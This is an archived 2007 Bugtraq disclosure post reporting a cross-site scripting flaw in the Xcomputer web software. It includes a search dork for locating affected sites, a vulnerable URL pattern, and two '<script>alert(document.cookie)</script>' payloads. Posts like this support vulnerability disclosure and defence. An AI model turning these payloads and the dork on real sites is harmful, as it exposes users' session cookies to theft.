Xcomputer - Lang Parameter Cross-Site Scripting Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Xcomputer - Lang Parameter Cross-Site Scripting Vulnerability
From: jose luis góngora fernández <sys-project@xxxxxxxxxxx>
Date: Mon, 15 Oct 2007 21:21:01 +0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

# Xcomputer - Lang Parameter Cross-Site Scripting Vulnerability
# Download:
# http://www.xcomputer.cz/
# Bug found by JosS / Jose Luis Góngora Fernández
# Contact: sys-project[at]hotmail.com
# Spanish Hackers Team
# www.spanish-hackers.com
# /server irc.freenode.net /join #fullsecure
# d0rk: "power by xcomputer.cz"
# Stop lammer

# Exploit In (XSS):

http://www.example.com/Search.asp?EXPS=[XSS]
....

# Cross Siting Scripting (Code):

"><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>

//---------------------------------------\\

Greetz To: All Hackers
JosS! / Jose Luis Góngora Fernández

_________________________________________________________________

Descubre la descarga digital con MSN Music. Más de un millón de canciones.http://music.msn.es/

Prev by Date: Re: [Full-disclosure] Remote Desktop Command Fixation Attacks
Next by Date: RE: playing for fun with <=IE7
Previous by thread: Stringbeans (Portal) - Lang Parameter Cross-Site Scripting Vulnerability
Next by thread: [SECURITY] [DSA 1387-1] New librpcsecgss packages fix arbitrary code execution
Index(es):
- Date
- Thread